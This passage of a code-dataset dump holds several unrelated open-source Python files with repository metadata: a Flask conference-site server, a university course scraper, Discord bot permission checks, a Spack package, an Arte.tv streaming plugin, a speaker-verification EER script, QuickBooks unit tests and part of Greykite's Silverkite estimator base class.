data["paper"] = format_open_problem(v)
data["pdfs"] = by_uid["pdfs"][uid]
return render_template("open_problem.html", **data)
else:
v = by_uid["papers"][uid]
data["paper"] = format_paper(v)
data["pdfs"] = by_uid["pdfs"][uid]
return render_template("poster.html", **data)
@app.route("/speaker_<speaker>.html")
def speaker(speaker):
uid = speaker
v = by_uid["speakers"][uid]
data = _data()
data["zoom"] = site_data["zoom"]
data["speaker"] = v
return render_template("speaker.html", **data)
#@app.route("/workshop_<workshop>.html")
#def workshop(workshop):
# uid = workshop
# v = by_uid["workshops"][uid]
# data = _data()
# data["workshop"] = format_workshop(v)
# return render_template("workshop.html", **data)
#@app.route("/chat.html")
#def chat():
# data = _data()
# return render_template("chat.html", **data)
# FRONT END SERVING
@app.route("/papers.json")
def paper_json():
json = []
for v in site_data["papers"]:
json.append(format_paper(v))
for v in site_data["open_problems"]:
json.append(format_open_problem(v))
return jsonify(json)
@app.route("/static/<path:path>")
def send_static(path):
return send_from_directory("static", path)
@app.route("/serve_<path>.json")
def serve(path):
return jsonify(site_data[path])
# --------------- DRIVER CODE -------------------------->
# Code to turn it all static
@freezer.register_generator
def generator():
    """Enumerate every URL Frozen-Flask must render when freezing the site."""
    for paper in site_data["papers"]:
        yield "poster", {"poster": str(paper["UID"])}
    for paper in site_data["open_problems"]:
        yield "poster", {"poster": str(paper["UID"])}
    for speaker in site_data["speakers"]:
        yield "speaker", {"speaker": str(speaker["UID"])}
    # for workshop in site_data["workshops"]:
    #     yield "workshop", {"workshop": str(workshop["UID"])}
    for key in site_data:
        yield "serve", {"path": key}
def parse_arguments():
    """Parse the CLI: a required data path plus an optional --build/-b flag
    that switches from serving the site to generating static assets."""
    cli = argparse.ArgumentParser(description="MiniConf Portal Command Line")
    cli.add_argument(
        "--build",
        action="store_true",
        default=False,
        help="Convert the site to static assets",
    )
    cli.add_argument(
        "-b",
        action="store_true",
        default=False,
        dest="build",
        help="Convert the site to static assets",
    )
    cli.add_argument("path", help="Pass the JSON data path and run the server")
    return cli.parse_args()
if __name__ == "__main__":
args = parse_arguments()
site_data_path = args.path
extra_files = main(site_data_path)
if args.build:
freezer.freeze()
with open("build/zoom.html", "w") as f:
f.write("<html><body><h1>The conference is over!</h1></body></html>")
with open("build/.htaccess", "w") as f:
# f.write('ModPagespeedDisallow "*"\n')
f.write('Options -Indexes\n')
else:
debug_val = False
if os.getenv("FLASK_DEBUG") == "True":
debug_val = True
app.run(port=5000, debug=debug_val, extra_files=extra_files)
| 25.231672 | 87 | 0.58159 |
cac6929c90be117d23719a23bd6105734a9217b0 | 3,162 | py | Python | ClassesPage.py | Hua777/NSYSUSelcrs | b36dc9dd7329c6d20f23d666facaa8e6e5251c63 | [
"MIT"
] | null | null | null | ClassesPage.py | Hua777/NSYSUSelcrs | b36dc9dd7329c6d20f23d666facaa8e6e5251c63 | [
"MIT"
] | null | null | null | ClassesPage.py | Hua777/NSYSUSelcrs | b36dc9dd7329c6d20f23d666facaa8e6e5251c63 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = "Hua777"
__copyright__ = "Copyright 2018, Hua777"
__version__ = "2.0"
__email__ = "liao.700529@gmail.com"
import Req
import CC
from ClassDetail import ClassDetail
from bs4 import BeautifulSoup as BS
import re as RE
class ClassesPage(object):
    """Scraper for the NSYSU course-selection search page.

    Query parameters are accumulated in ``self.Config``; ``Crawl`` fetches
    and parses one page of results, updating ``self.Pages`` with the total
    page count.
    """

    def __init__(self):
        self.Reset()
        self.Pages = 0  # total page count, filled in by Crawl()

    # Set the academic year/term, e.g. '1071'.
    def SetYear(self, year):
        self.SetConfig('D0', year)

    # Set the result page number.
    def SetPage(self, page):
        self.SetConfig('page', page)

    # Set the teacher name.
    def SetTeacher(self, teacher):
        # Bug fix: this previously wrote into the 'page' key, clobbering
        # pagination and never filtering by teacher.
        self.SetConfig('teacher', teacher)

    # Set the course number.
    def SetNumber(self, number):
        self.SetConfig('T3', number)

    def FixToBS(self):
        """Fetch the search page and return it as BeautifulSoup.

        The university site serves malformed HTML; patch the markup
        (drop the broken <style> block, fix the 'snall' typo for 'small')
        before parsing.
        """
        html = RE.sub(
            r"<style.*<\/style>",
            '<body>',
            RE.sub(
                r"snall",
                'small',
                Req.Get('search', self.Config)
            )
        )
        return BS(html, 'html.parser')

    def Crawl(self, obj=False):
        """Scrape the current result page.

        Returns a list of per-course value lists, or ``ClassDetail``
        objects when ``obj`` is true.
        """
        bs = self.FixToBS()
        # The footer row reads like '第 X / Y 頁'; Y is the total page count.
        final_tr = bs.find_all('tr')[-1]
        pattern = RE.compile(r'第 ([0-9]+) \/ ([0-9]+) 頁')
        match = pattern.match(final_tr.get_text())
        self.Pages = int(match[2])
        # Convert each data row; skip 3 header rows and 2 footer rows.
        result = []
        for tr in bs.find_all('tr')[3:-2]:
            tmp = []
            idx = 0
            for td in tr.find_all('td'):
                # The site emits stray cells beyond column 25; ignore them.
                if idx < 25:
                    tmp_text = td.get_text().strip().replace(' ', '-')
                    if idx == 7:
                        # Course-name cell: link text, a Simplified-Chinese
                        # copy, and the syllabus URL.
                        name = td.find('a').get_text().strip()
                        tmp.append(name)
                        tmp.append(CC.T2S(name))
                        tmp.append(td.find('a')['href'])
                    elif idx == 3 or idx == 15:
                        # Department / teacher: also keep a Simplified copy.
                        tmp.append(tmp_text)
                        tmp.append(CC.T2S(tmp_text))
                    else:
                        tmp.append(tmp_text)
                else:
                    break
                idx += 1
            if obj:
                result.append(ClassDetail(tmp))
            else:
                result.append(tmp)
        return result

    def SetConfig(self, key, value):
        """Set an arbitrary query parameter."""
        self.Config[key] = value

    def Reset(self):
        """Restore every query parameter to its default value."""
        self.Config = {
            'a': 1,
            'HIS': 1,
            'IDNO': '',
            'ITEM': '',
            'D0': Req.Year,         # academic year/term, e.g. 1071
            'DEG_COD': '*',         # degree level: * A B M N P
            'D1': '',               # offering department
            'D2': '',               # grade/year
            'CLASS_COD': '',        # class
            'SECT_COD': '',         # group
            'TYP': 1,               # query item: 1 = course time, 2 = enrollment
            'teacher': '',          # teacher name
            'crsname': '',          # course name
            'T3': '',               # course number
            'WKDAY': '',            # weekday 1-7
            'SECT': '',             # period: A 1 2 3 4 B 5 6 7 8 9 C D E F
            'page': 1,              # result page number
            'bottom_per_page': 10,  # unused by the server
            'data_per_page': 20     # unused by the server
        }
| 27.495652 | 74 | 0.424415 |
759220bd982a405d443c509296e9167c676bede4 | 3,364 | py | Python | monty/exts/backend/global_checks.py | onerandomusername/monty-python | fcd8b2827eb9bbb2a05d28f80ac9e215589f03f7 | [
"MIT"
] | 20 | 2021-12-31T10:17:20.000Z | 2022-03-31T04:16:17.000Z | monty/exts/backend/global_checks.py | onerandomusername/monty-bot | b1c769e44b56bc45f37fc809064571d59c80db27 | [
"MIT"
] | 1 | 2022-03-13T22:34:33.000Z | 2022-03-13T22:34:52.000Z | monty/exts/backend/global_checks.py | onerandomusername/monty-bot | b1c769e44b56bc45f37fc809064571d59c80db27 | [
"MIT"
] | 3 | 2022-01-02T15:21:46.000Z | 2022-03-05T09:37:54.000Z | import disnake
from disnake.ext import commands
from monty.bot import Monty
from monty.errors import BotAccountRequired
from monty.log import get_logger
logger = get_logger(__name__)
class GlobalCheck(commands.Cog, slash_command_attrs={"dm_permission": False}):
    """Global checks for monty."""

    def __init__(self, bot: Monty):
        self.bot = bot
        self._bot_invite_link: str = ""
        # Collect every method named global_check_* so add/remove stay in sync.
        self._checks = {attr: getattr(self, attr) for attr in dir(self) if attr.startswith("global_check_")}
        self.add_checks()

    @commands.Cog.listener("on_ready")
    async def set_invite_link(self) -> None:
        """Set the invite link when the bot is ready."""
        if self._bot_invite_link:
            return

        class FakeGuild:
            # Placeholder keeps a literal {guild_id} slot in the generated
            # URL, filled in per-guild by str.format later.
            id = "{guild_id}"

        guild = FakeGuild
        self._bot_invite_link = disnake.utils.oauth_url(
            self.bot.user.id,
            disable_guild_select=True,
            guild=guild,
            scopes={"applications.commands", "bot"},
            permissions=self.bot.invite_permissions,
        )

    def add_checks(self) -> None:
        """Adds all checks to the bot."""
        for name, check in self._checks.items():
            if name.startswith("global_check_app_cmd"):
                self.bot.add_app_command_check(
                    check, call_once=True, slash_commands=True, user_commands=True, message_commands=True
                )
            elif name.startswith("global_check_prefix_cmd"):
                self.bot.add_check(check, call_once=True)
            else:
                # Fixed: logger.warn is a deprecated alias of logger.warning.
                logger.warning(f"Invalid named check in {type(self).__name__} cog")

    def remove_checks(self) -> None:
        """Removes all cog checks from the bot."""
        for name, check in self._checks.items():
            if name.startswith("global_check_app_cmd"):
                self.bot.remove_app_command_check(
                    check, call_once=True, slash_commands=True, user_commands=True, message_commands=True
                )
            elif name.startswith("global_check_prefix_cmd"):
                self.bot.remove_check(check, call_once=True)
            else:
                # no warning here as it was warned for during load
                pass

    def global_check_app_cmd(self, inter: disnake.CommandInteraction) -> bool:
        """Require all commands be in a guild and have the bot scope."""
        if inter.guild or not inter.guild_id:
            return True
        invite = self._bot_invite_link.format(guild_id=inter.guild_id)
        # Tailor the message: managers can invite the bot themselves.
        if inter.permissions.manage_guild:
            msg = (
                f"The bot scope is required to perform any actions. "
                f"You can invite the full bot by [clicking here](<{invite}>)."
            )
        else:
            msg = (
                f"The bot scope is required to perform any actions. "
                f"Please ask a server manager to [invite the full bot](<{invite}>)."
            )
        raise BotAccountRequired(msg)

    def global_check_prefix_cmd(self, ctx: commands.Context) -> bool:
        """Require all commands be in guild."""
        if ctx.guild:
            return True
        raise commands.NoPrivateMessage()

    # Disnake calls cog_unload on removal; reuse remove_checks for cleanup.
    cog_unload = remove_checks
# Extension entry point invoked by the bot's load_extension machinery.
def setup(bot: Monty) -> None:
    """Add the global checks to the bot."""
    bot.add_cog(GlobalCheck(bot))
| 35.410526 | 108 | 0.606124 |
7e42f9af9f63e394e19613df939fd6aa25a87b6b | 1,299 | py | Python | var/spack/repos/builtin/packages/py-pytz/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2020-10-15T01:08:42.000Z | 2021-10-18T01:28:18.000Z | var/spack/repos/builtin/packages/py-pytz/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2019-07-30T10:12:28.000Z | 2019-12-17T09:02:27.000Z | var/spack/repos/builtin/packages/py-pytz/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2019-07-30T09:42:14.000Z | 2021-01-25T05:39:20.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPytz(PythonPackage):
    """World timezone definitions, modern and historical."""
    homepage = "http://pythonhosted.org/pytz"
    url      = "https://pypi.io/packages/source/p/pytz/pytz-2019.3.tar.gz"
    # Modules that must be importable after install (Spack's import test).
    import_modules = ['pytz']
    # Known releases pinned by the sha256 of their PyPI source tarball.
    version('2019.3', sha256='b02c06db6cf09c12dd25137e563b31700d3b80fcc4ad23abb7a315f2789819be')
    version('2018.4', sha256='c06425302f2cf668f1bba7a0a03f3c1d34d4ebeef2c72003da308b3947c7f749')
    version('2016.10', sha256='9a43e20aa537cfad8fe7a1715165c91cb4a6935d40947f2d070e4c80f2dcd22b')
    version('2016.6.1', sha256='6f57732f0f8849817e9853eb9d50d85d1ebb1404f702dbc44ee627c642a486ca')
    version('2014.10', sha256='a94138b638907491f473c875e8c95203a6a02efef52b6562be302e435016f4f3')
    version('2014.9', sha256='c5bcbd11cf9847096ae1eb4e83dde75d10ac62efe6e73c4600f3f980968cdbd2')
    version('2015.4', sha256='c4ee70cb407f9284517ac368f121cf0796a7134b961e53d9daf1aaae8f44fb90')
    version('2016.3', sha256='3449da19051655d4c0bb5c37191331748bcad15804d81676a88451ef299370a8')
    # Build-time only dependency.
    depends_on('py-setuptools', type='build')
| 48.111111 | 98 | 0.786759 |
822cff52e3046b33fa723bd02cebf6aaf7058dbe | 3,541 | py | Python | src/streamlink/plugins/artetv.py | nxkbd/streamlink | 0ba7767c024a6d6086d570e342680dc40c05a57b | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/artetv.py | nxkbd/streamlink | 0ba7767c024a6d6086d570e342680dc40c05a57b | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/artetv.py | nxkbd/streamlink | 0ba7767c024a6d6086d570e342680dc40c05a57b | [
"BSD-2-Clause"
] | null | null | null | """Plugin for Arte.tv, bi-lingual art and culture channel."""
import re
from itertools import chain
from streamlink.compat import urlparse
from streamlink.plugin import Plugin
from streamlink.plugin.api import http, validate
from streamlink.stream import HDSStream, HLSStream, HTTPStream, RTMPStream
SWF_URL = "http://www.arte.tv/player/v2/jwplayer6/mediaplayer.6.6.swf"
JSON_VOD_URL = "https://api.arte.tv/api/player/v1/config/{}/{}"
JSON_LIVE_URL = "https://api.arte.tv/api/player/v1/livestream/{}"
_url_re = re.compile(r"""
https?://(?:\w+\.)?arte.tv/guide/
(?P<language>[a-z]{2})/
(?:
(?P<video_id>.+?)/.+ | # VOD
(?:direct|live) # Live TV
)
""", re.VERBOSE)
_video_schema = validate.Schema({
"videoJsonPlayer": {
"VSR": validate.any(
[],
{
validate.text: {
"height": int,
"mediaType": validate.text,
"url": validate.text,
validate.optional("streamer"): validate.text
},
},
),
"VTY": validate.text
}
})
class ArteTV(Plugin):
    @classmethod
    def can_handle_url(self, url):
        # NOTE(review): the first parameter of a classmethod is
        # conventionally `cls`; it is named `self` here but works the same.
        return _url_re.match(url)
    def _create_stream(self, stream, is_live):
        """Yield (quality name, Stream) pairs for one entry of the VSR dict."""
        stream_name = "{0}p".format(stream["height"])
        stream_type = stream["mediaType"]
        stream_url = stream["url"]
        if stream_type in ("hls", "mp4"):
            if urlparse(stream_url).path.endswith("m3u8"):
                try:
                    streams = HLSStream.parse_variant_playlist(self.session, stream_url)
                    # TODO: Replace with "yield from" when dropping Python 2.
                    for stream in streams.items():
                        yield stream
                except IOError as err:
                    self.logger.error("Failed to extract HLS streams: {0}", err)
            else:
                # Plain mp4 URL: serve as a progressive HTTP stream.
                yield stream_name, HTTPStream(self.session, stream_url)
        elif stream_type == "f4m":
            try:
                streams = HDSStream.parse_manifest(self.session, stream_url)
                for stream in streams.items():
                    yield stream
            except IOError as err:
                self.logger.error("Failed to extract HDS streams: {0}", err)
        elif stream_type == "rtmp":
            params = {
                "rtmp": stream["streamer"],
                "playpath": stream["url"],
                "swfVfy": SWF_URL,
                "pageUrl": self.url,
            }
            if is_live:
                params["live"] = True
            else:
                # VOD play paths require the mp4: prefix.
                params["playpath"] = "mp4:{0}".format(params["playpath"])
            stream = RTMPStream(self.session, params)
            yield stream_name, stream
    def _get_streams(self):
        """Resolve the page URL to the Arte player JSON and build all streams."""
        match = _url_re.match(self.url)
        language = match.group('language')
        video_id = match.group('video_id')
        if video_id is None:
            # No video id in the URL means the live TV channel.
            json_url = JSON_LIVE_URL.format(language)
        else:
            json_url = JSON_VOD_URL.format(language, video_id)
        res = http.get(json_url)
        video = http.json(res, schema=_video_schema)
        if not video["videoJsonPlayer"]["VSR"]:
            return
        is_live = video["videoJsonPlayer"]["VTY"] == "LIVE"
        vsr = video["videoJsonPlayer"]["VSR"].values()
        streams = (self._create_stream(stream, is_live) for stream in vsr)
        return chain.from_iterable(streams)
# streamlink discovers plugins through this module-level attribute.
__plugin__ = ArteTV
| 31.336283 | 88 | 0.550409 |
c24295eb14ef47ae8937923ca9059186dfdebbc0 | 1,907 | py | Python | eval.py | sunshines14/ASV-baseline | c2b957189c33eba14003b8bfa88e3c459fb93697 | [
"MIT"
] | 1 | 2021-05-12T08:52:57.000Z | 2021-05-12T08:52:57.000Z | eval.py | sunshines14/ASV-baseline | c2b957189c33eba14003b8bfa88e3c459fb93697 | [
"MIT"
] | null | null | null | eval.py | sunshines14/ASV-baseline | c2b957189c33eba14003b8bfa88e3c459fb93697 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#-*- coding: utf-8 -*-
# Copyright 2020 Sogang University Auditory Intelligence Laboratory (Author: Soonshin Seo)
#
# MIT License
import os
import numpy
import argparse
import pdb
import numpy as np
from scipy.optimize import brentq
from sklearn.metrics import roc_curve
from scipy.interpolate import interp1d
parser = argparse.ArgumentParser(description = "eval");
parser.add_argument('--ground_truth', type=str, default=None);
parser.add_argument('--prediction', type=str, default=None);
parser.add_argument('--positive', type=int, default=1, help='1 if higher is positive; 0 is lower is positive');
opt = parser.parse_args();
def read_score(filename):
    """Read one score per line from *filename*.

    Only the first whitespace-separated token of each line is used, parsed
    as a float; anything after it (e.g. a trial label) is ignored.
    """
    with open(filename) as f:
        return [float(line.split()[0]) for line in f]
def calculate_metrics(y, y_score, pos):
    """Compute the EER, its threshold, and the normalized minDCF.

    Parameters
    ----------
    y : ground-truth labels.
    y_score : prediction scores.
    pos : label value treated as the positive class.
    """
    # ROC curve gives false-positive rate, true-positive rate and the
    # score thresholds at which they were measured.
    fpr, tpr, thresholds = roc_curve(y, y_score, pos_label=pos)

    # Equal error rate (EER): the operating point where FPR == 1 - TPR.
    eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
    thresh = interp1d(fpr, thresholds)(eer)

    # Normalized minimum detection cost function (minDCF) with
    # C_miss = 10, C_fa = 1 and a target prior of 0.01.
    c_miss = 10
    c_fa = 1
    p_target = 0.01
    fnr = 1 - tpr
    dcf = c_miss * fnr * p_target + c_fa * fpr * (1 - p_target)
    c_det = np.min(dcf)
    c_def = min(c_miss * p_target, c_fa * (1 - p_target))
    m_dcf = c_det / c_def
    return eer, thresh, m_dcf
if __name__ == '__main__':
    # The two score files are parallel: one label and one prediction per line.
    labels = read_score(opt.ground_truth)
    scores = read_score(opt.prediction)
    eer, thresh, m_dcf = calculate_metrics(labels, scores, opt.positive)
    print('EER : %.4f%%' % (eer * 100))
    print('thresh : %.4f' % (thresh))
    print('minDCF : %.4f' % (m_dcf))
4691d5f205b68fa319b783f97d704d43d5876dfa | 1,183 | py | Python | tests/unit/objects/test_creditcardpayment.py | bayusantoso/python-intuitquickbooks | a501fd86b6ba59f5a614f36951fa08bde0d2d24a | [
"MIT"
] | null | null | null | tests/unit/objects/test_creditcardpayment.py | bayusantoso/python-intuitquickbooks | a501fd86b6ba59f5a614f36951fa08bde0d2d24a | [
"MIT"
] | null | null | null | tests/unit/objects/test_creditcardpayment.py | bayusantoso/python-intuitquickbooks | a501fd86b6ba59f5a614f36951fa08bde0d2d24a | [
"MIT"
] | 1 | 2020-12-07T22:21:35.000Z | 2020-12-07T22:21:35.000Z | import unittest
from intuitquickbooks.objects.creditcardpayment import CreditCardPayment, CreditChargeResponse, CreditChargeInfo
class CreditCardPaymentTests(unittest.TestCase):
    """Unit tests for the default state of ``CreditCardPayment``."""

    def test_init(self):
        # A freshly constructed payment has neither charge info nor a response.
        # `assertEquals` is a deprecated alias (removed in Python 3.12);
        # use `assertIsNone` / `assertEqual` instead.
        payment = CreditCardPayment()
        self.assertIsNone(payment.CreditChargeInfo)
        self.assertIsNone(payment.CreditChargeResponse)
class CreditChargeResponseTests(unittest.TestCase):
    """Unit tests for the default state of ``CreditChargeResponse``."""

    def test_init(self):
        # All string fields default to the empty string.
        # `assertEquals` is a deprecated alias (removed in Python 3.12);
        # use `assertEqual` instead.
        response = CreditChargeResponse()
        self.assertEqual(response.CCTransId, "")
        self.assertEqual(response.AuthCode, "")
        self.assertEqual(response.TxnAuthorizationTime, "")
        self.assertEqual(response.Status, "")
class CreditChargeInfoTests(unittest.TestCase):
    """Unit tests for the default state of ``CreditChargeInfo``."""

    def test_init(self):
        # String fields default to "", numeric fields to 0 and
        # ProcessPayment to False.
        # `assertEquals` is a deprecated alias (removed in Python 3.12);
        # use `assertEqual` instead.
        info = CreditChargeInfo()
        self.assertEqual(info.Type, "")
        self.assertEqual(info.NameOnAcct, "")
        self.assertEqual(info.CcExpiryMonth, 0)
        self.assertEqual(info.CcExpiryYear, 0)
        self.assertEqual(info.BillAddrStreet, "")
        self.assertEqual(info.PostalCode, "")
        self.assertEqual(info.Amount, 0)
        self.assertEqual(info.ProcessPayment, False)
ec8915631d3f3d0aa061daeaf6b2a7750c7998f2 | 23,016 | py | Python | greykite/sklearn/estimator/base_silverkite_estimator.py | briancpark/greykite | 2f484978a7ed206ebd9356e02fc1fb881cd25205 | [
"BSD-2-Clause"
] | null | null | null | greykite/sklearn/estimator/base_silverkite_estimator.py | briancpark/greykite | 2f484978a7ed206ebd9356e02fc1fb881cd25205 | [
"BSD-2-Clause"
] | null | null | null | greykite/sklearn/estimator/base_silverkite_estimator.py | briancpark/greykite | 2f484978a7ed206ebd9356e02fc1fb881cd25205 | [
"BSD-2-Clause"
] | null | null | null | # BSD 2-CLAUSE LICENSE
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# #ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# original author: Albert Chen, Reza Hosseini, Sayan Patra
"""sklearn estimator with common functionality between
SilverkiteEstimator and SimpleSilverkiteEstimator.
"""
from typing import Dict
from typing import Optional
import modin.pandas as pd
from sklearn.exceptions import NotFittedError
from sklearn.metrics import mean_squared_error
from greykite.algo.common.col_name_utils import create_pred_category
from greykite.algo.forecast.silverkite.forecast_silverkite import SilverkiteForecast
from greykite.algo.forecast.silverkite.forecast_silverkite_helper import get_silverkite_uncertainty_dict
from greykite.algo.forecast.silverkite.silverkite_diagnostics import SilverkiteDiagnostics
from greykite.common import constants as cst
from greykite.common.time_properties import min_gap_in_seconds
from greykite.common.time_properties_forecast import get_simple_time_frequency_from_period
from greykite.sklearn.estimator.base_forecast_estimator import BaseForecastEstimator
class BaseSilverkiteEstimator(BaseForecastEstimator):
    """A base class for forecast estimators that fit using
    `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.

    Notes
    -----
    Allows estimators that fit using
    `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`
    to share the same functions for input data validation,
    fit postprocessing, predict, summary, plot_components, etc.

    Subclasses should:

    - Implement their own ``__init__`` that uses a superset of the parameters here.
    - Implement their own ``fit``, with this sequence of steps:

        - calls ``super().fit``
        - calls ``SilverkiteForecast.forecast`` or
          ``SimpleSilverkiteForecast.forecast_simple`` and stores the result
          in ``self.model_dict``
        - calls ``super().finish_fit``

    Uses ``coverage`` to set prediction band width. Even though
    coverage is not needed by ``forecast_silverkite``, it is included
    in every ``BaseForecastEstimator`` to be used universally for
    forecast evaluation.

    Therefore, ``uncertainty_dict`` must be consistent with ``coverage``
    if provided as a dictionary. If ``uncertainty_dict`` is None or
    "auto", an appropriate default value is set, according to ``coverage``.

    Parameters
    ----------
    score_func : callable, optional, default mean_squared_error
        See `~greykite.sklearn.estimator.base_forecast_estimator.BaseForecastEstimator`.
    coverage : `float` between [0.0, 1.0] or None, optional
        See `~greykite.sklearn.estimator.base_forecast_estimator.BaseForecastEstimator`.
    null_model_params : `dict`, optional
        Dictionary with arguments to define DummyRegressor null model, default is `None`.
        See `~greykite.sklearn.estimator.base_forecast_estimator.BaseForecastEstimator`.
    uncertainty_dict : `dict` or `str` or None, optional
        How to fit the uncertainty model.
        See `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
        Note that this is allowed to be "auto". If None or "auto", will be set to
        a default value by ``coverage`` before calling ``forecast_silverkite``.

    Attributes
    ----------
    silverkite : Class or a derived class of `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast`
        The silverkite algorithm instance used for forecasting.
    silverkite_diagnostics : Class or a derived class of `~greykite.algo.forecast.silverkite.silverkite_diagnostics.SilverkiteDiagnostics`
        The silverkite class used for plotting and generating model summary.
    model_dict : `dict` or None
        A dict with fitted model and its attributes.
        The output of `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
    pred_cols : `list` [`str`] or None
        Names of the features used in the model.
    feature_cols : `list` [`str`] or None
        Column names of the patsy design matrix built by
        `~greykite.algo.common.ml_models.design_mat_from_formula`.
    df : `pandas.DataFrame` or None
        The training data used to fit the model.
    coef_ : `pandas.DataFrame` or None
        Estimated coefficient matrix for the model.
        Not available for ``random forest`` and ``gradient boosting`` methods and
        set to the default value `None`.
    _pred_category : `dict` or None
        A dictionary with keys being the predictor category and
        values being the predictors belonging to the category.
        For details, see
        `~greykite.sklearn.estimator.base_silverkite_estimator.BaseSilverkiteEstimator.pred_category`.
    extra_pred_cols : `list` or None
        User provided extra predictor names, for details, see
        `~greykite.sklearn.estimator.simple_silverkite_estimator.SimpleSilverkiteEstimator`
        or
        `~greykite.sklearn.estimator.silverkite_estimator.SilverkiteEstimator`.
    forecast : `pandas.DataFrame` or None
        Output of ``predict_silverkite``, set by ``self.predict``.
    model_summary : `class` or `None`
        The `~greykite.algo.common.model_summary.ModelSummary` class.

    See Also
    --------
    `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`
        Function performing the fit and predict.

    Notes
    -----
    The subclasses will pass ``fs_components_df`` to ``forecast_silverkite``. The model terms
    it creates internally are used to generate the component plots.

    - `~greykite.common.features.timeseries_features.fourier_series_multi_fcn` uses
      ``fs_components_df["names"]`` (e.g. ``tod``, ``tow``) to build the fourier series
      and to create column names.
    - ``fs_components_df["seas_names"]`` (e.g. ``daily``, ``weekly``) is appended
      to the column names, if provided.

    `~greykite.algo.forecast.silverkite.silverkite_diagnostics.SilverkiteDiagnostics.plot_silverkite_components` groups
    based on ``fs_components_df["seas_names"]`` passed to ``forecast_silverkite`` during fit.
    E.g. any column containing ``daily`` is added to daily seasonality effect. The reason
    is as follows:

    1. User can provide ``tow`` and ``str_dow`` for weekly seasonality.
       These should be aggregated, and we can do that only based on "seas_names".
    2. yearly and quarterly seasonality both use ``ct1`` as "names" column.
       Only way to distinguish those effects is via "seas_names".
    3. ``ct1`` is also used for growth. If it is interacted with seasonality, the columns become
       indistinguishable without "seas_names".

    Additionally, the function sets yaxis labels based on ``seas_names``:
    ``daily`` as ylabel is much more informative than ``tod`` as ylabel in component plots.
    """

    def __init__(
            self,
            silverkite: SilverkiteForecast = SilverkiteForecast(),
            silverkite_diagnostics: SilverkiteDiagnostics = SilverkiteDiagnostics(),
            score_func: callable = mean_squared_error,
            coverage: float = None,
            null_model_params: Optional[Dict] = None,
            uncertainty_dict: Optional[Dict] = None):
        # initializes null model
        super().__init__(
            score_func=score_func,
            coverage=coverage,
            null_model_params=null_model_params)

        # required in subclasses __init__
        self.uncertainty_dict = uncertainty_dict

        # set by `fit`
        # fitted model in dictionary format returned from
        # the `forecast_silverkite` function
        self.silverkite: SilverkiteForecast = silverkite
        self.silverkite_diagnostics: SilverkiteDiagnostics = silverkite_diagnostics
        self.model_dict = None
        self.pred_cols = None
        self.feature_cols = None
        self.df = None
        self.coef_ = None

        # Predictor category, lazy initialization as None.
        # Will be updated in property function pred_category when needed.
        self._pred_category = None
        self.extra_pred_cols = None  # all silverkite estimators should support this

        # set by the predict method
        self.forecast = None
        # set by the summary method
        self.model_summary = None

    def __set_uncertainty_dict(self, X, time_col, value_col):
        """Checks if ``coverage`` is consistent with the ``uncertainty_dict``
        used to train the ``forecast_silverkite`` model. Sets ``uncertainty_dict``
        to a default value if ``coverage`` is provided, and vice versa.

        Parameters
        ----------
        X: `pandas.DataFrame`
            Input timeseries, with timestamp column,
            value column, and any additional regressors.
            The value column is the response, included in
            ``X`` to allow transformation by `sklearn.pipeline.Pipeline`.
        time_col: `str`
            Time column name in ``X``.
        value_col: `str`
            Value column name in ``X``.

        Notes
        -----
        Intended to be called by `fit`.

        ``X`` is necessary to define default parameters for
        ``uncertainty_dict`` if ``coverage`` is provided but ``uncertainty_dict is None``
        or ``uncertainty_dict=="auto"``.
        (NB: ``X`` would not be necessary and this function could called from __init__
        if ``forecast_silverkite`` provides a default value for ``uncertainty_dict``
        given the target coverage).
        """
        # Infers the data frequency from the smallest timestamp gap.
        period = min_gap_in_seconds(df=X, time_col=time_col)
        simple_freq = get_simple_time_frequency_from_period(period).name

        # Updates `uncertainty_dict` if None or "auto" or missing quantiles,
        # to match ``coverage``.
        # Raises an exception if both are provided and they don't match.
